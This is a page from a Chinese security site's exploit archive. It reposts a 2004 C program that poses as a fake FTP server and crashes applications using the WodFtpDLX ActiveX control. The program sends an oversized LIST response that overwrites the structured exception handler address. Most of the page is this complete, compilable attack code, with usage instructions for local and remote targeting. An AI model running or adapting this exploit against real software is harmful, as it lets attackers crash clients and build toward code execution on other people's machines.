首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WeOnlyDo! COM Ftp DELUXE ActiveX Control Overflow Exploit
来源:unsecure.altervista.org 作者:Komrade 发布时间:2004-11-24  

WeOnlyDo! COM Ftp DELUXE ActiveX Control Overflow Exploit

/************************************************************************************

WodFtpDLX Client ActiveX Control Buffer Overflow Crash Exploit
created by Komrade
e-mail: unsecure(at)altervista(dot)org
web: http://unsecure.altervista.org

Tested on WodFtpDLX.ocx versions 2.3.2.90 - 2.3.0.0 - 2.2.0.1
on a Windows XP Professional sp2 operating system.

This exploit creates a fake FTP server on your machine, waiting for the
connection of an application that uses the WodFtpDLX.ocx ActiveX Control.
After the exploit is sent the application will crash, trying to access
to a bad memory address: 0xDEADCODE.
This exploit can be executed locally or remotely.

Usage: wodftpcrash [-l] [-r server IP]

Options:
-l executed locally
-r serverIP executed remotely. You need to specify the address
of the FTP server for the PASV command (Insert your IP address)

Examples:

C:\> wodftpcrash -l <- executed locally
C:\> wodftpCrash -r 10.0.0.1 <- executed remotely

***************************************************************************************/

#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

#define FTP_PORT 21
#define PASV_PORT 1106

int wait = TRUE;

DWORD WINAPI fileList(LPVOID data);

int main(int argc,char **argv){

SOCKET sock, client;
struct sockaddr_in sock_addr,client_addr;
WSADATA data;
WORD p;
char mess[4096], received[512], addr[32];
int lun, n, i, err;
HANDLE fileListH;
DWORD fileListId, exitCode;

printf("------------------------------------------------------------------------------\r\n");
printf("WodFtpDLX Client ActiveX Control Buffer Overflow Crash Exploit\r\n");
printf("\t\t\tcreated by Komrade\r\n\r\n");

printf("\t\te-mail: unsecure(at)altervista(dot)org\r\n");
printf("\t\tweb: http://unsecure.altervista.org\r\n");
printf("------------------------------------------------------------------------------\r\n\r\n");

if (((argc != 2) || (strcmp(argv[1], "-l") != 0)) && ((argc != 3) || (strcmp(argv[1], "-r") != 0))){
printf("Usage: WodFtpCrash [-l] [-r server IP]\r\n\r\n");
printf("Options:\r\n");
printf(" -l\t\texecuted locally.\r\n");
printf(" -r server IP\texecuted remotely. You need to specify the address of the\r\n");
printf("\t\tFTP server for the PASV command (Insert your IP address)\r\n");
printf("\r\nExamples:\r\n");
printf(" wodftpcrash -l\t\t\texecuted locally\r\n");
printf(" wodftpCrash -r 10.0.0.1\texecuted remotely\r\n");
return 0;
}

if(strcmp(argv[1], "-r") == 0){
char *token[4];

token[0]=strtok(argv[2], ".");
for(i = 1; i < 4; i++){
token[i]=strtok(NULL, ".");
}

strcpy(addr, "\0");

for(i=0; (i < 4) && (token[i]!= NULL); i++){
strlcat(addr, token[i], 16);
strcat(addr, ",");
}
}
else
strcpy(addr, "127,0,0,1,");

p = MAKEWORD(2, 0);
WSAStartup(p, &data);

sock=socket(PF_INET,SOCK_STREAM,0);
sock_addr.sin_family=PF_INET;
sock_addr.sin_port=htons(FTP_PORT);
sock_addr.sin_addr.s_addr=INADDR_ANY;

err = bind(sock, (struct sockaddr*)&sock_addr, sizeof(struct sockaddr_in));
if (err < 0){
printf("Error in bind(). Port may be in use\r\n");
return -1;
}
err = listen(sock,1);
if (err < 0){
printf("Error in listen()\r\n");
return -1;
}

lun = sizeof (struct sockaddr);

printf("Opening the FTP port and waiting for connections...\r\n");
client = accept(sock, (struct sockaddr*)&client_addr, &lun);
printf("Client connected from IP: %s\r\n\r\n", inet_ntoa(client_addr.sin_addr));

strcpy(mess, "220 WodFtpDlx ActiveX Control Crash Exploit\r\n");
n=send(client, mess, strlen(mess), 0);
if (n < 0){
printf("Error in send()\r\n");
return -1;
}

while(wait == TRUE){

Sleep(800);
n = recv(client, received, sizeof(mess), 0);
if (n < 0){
printf("Error in recv()\r\n");
return -1;
}

received[n]=0;
printf("CLIENT: %s", received);

if (stricmp("USER", strtok(received, " ")) == 0)
strcpy(mess, "331 Anonymous access allowed, send password.\r\n");
else if (stricmp("PASS", strtok(received, " ")) == 0)
strcpy(mess, "230 Anonymous user logged in.\r\n");
else if (stricmp("PWD\r\n", received) == 0)
strcpy(mess, "257 \"/\" is current directory.\r\n");
else if (stricmp("CWD", strtok(received, " ")) == 0)
strcpy(mess, "257 \"/\" is current directory.\r\n");
else if (stricmp("TYPE", strtok(received, " ")) == 0)
strcpy(mess, "200 Type set to A.\r\n");
else if (stricmp("PASV\r\n", received) == 0){
fileListH = CreateThread(NULL, 0, fileList, NULL, 0, &fileListId);
if (fileListH == NULL)
printf("Error in CreateThread() %d", GetLastError());
wsprintf(mess, "227 Entering Passive Mode (%s4,82).\r\n", addr);
}
else if (stricmp("LIST", strtok(received, " ")) == 0 || stricmp("LIST\r\n", received) == 0){
strcpy(mess, "125 Data connection already open; Transfer starting.\r\n");
printf("SERVER: %s\r\n", mess);
n=send(client, mess, strlen(mess), 0);
if (n < 0){
printf("Error in send()\r\n");
return -1;
}
wait = FALSE;

do{
GetExitCodeThread(fileListH, &exitCode);
Sleep(100);
}
while(exitCode == STILL_ACTIVE);
printf("< Long file name sent to client >\r\n\r\n");

strcpy(mess, "226 Transfer complete.\r\n");
}
else
strcpy(mess, "550 Unimplemented\r\n");

printf("SERVER: %s\r\n", mess);
n = send(client, mess, strlen(mess), 0);
if (n < 0){
printf("Error in send()\r\n");
return -1;
}
}

printf("Wait.......");
Sleep(2000);
printf("Exploit succesfully sent!\r\n");

closesocket (client);
closesocket(sock);

WSACleanup();
return 0;
}

DWORD WINAPI fileList(LPVOID data){

char SEHAddr[] = "\xDE\xC0\xAD\xDE"; //this will be the new SEH address

SOCKET sock, client, list;
struct sockaddr_in sock_addr,client_addr;

WSADATA wData;
WORD p;
char mess[4096];
int lun, n, i, err;

p = MAKEWORD(2, 0);
WSAStartup(p, &wData);

sock=socket(PF_INET,SOCK_STREAM,0);
sock_addr.sin_family=PF_INET;
sock_addr.sin_port=htons(PASV_PORT);
sock_addr.sin_addr.s_addr=INADDR_ANY;
err = bind(sock, (struct sockaddr*)&sock_addr, sizeof(struct sockaddr_in));
if (err < 0){
printf("Error in bind(). Port may be in use\r\n");
return -1;
}
err = listen(sock,1);
if (err < 0){
printf("Error in listen().\r\n");
return -1;
}
lun = sizeof (struct sockaddr);

client = accept(sock, (struct sockaddr*)&client_addr, &lun);

while (wait == TRUE)
Sleep(100);

strcpy(mess, "03-04-81 12:00PM 3 ");

for(i=strlen(mess); i<1083; i++)
mess[i]='a';
mess[i]='\0';

strcat(mess, SEHAddr);

for(i=strlen(mess); i<1300; i++) // cause the exception
mess[i]='b';
mess[i]='\0';

strcat(mess, "\r\n");

n = send(client, mess, strlen(mess), 0);
if (n < 0){
printf("Error in send()\r\n");
return -1;
}

closesocket(sock);
closesocket(client);
WSACleanup();

return 0;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CoffeeCup FTP Clients Remote B
·phpBB highlight parameter Proc
·phpBB highlight parameter Proc
·Invision Power Board v2.0.0 -
·TWiki 20030201 search.pm Remot
·ProZilla <= 1.3.6 Format st
·Java JNI/DNS Queries DoS
·DMS POP3 Remote BufferOverflow
·Technote remote command execut
·GFHost PHP GMail Remote Comman
·Cscope version 15.5 and minor
·Halo Broadcast Client Crash
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved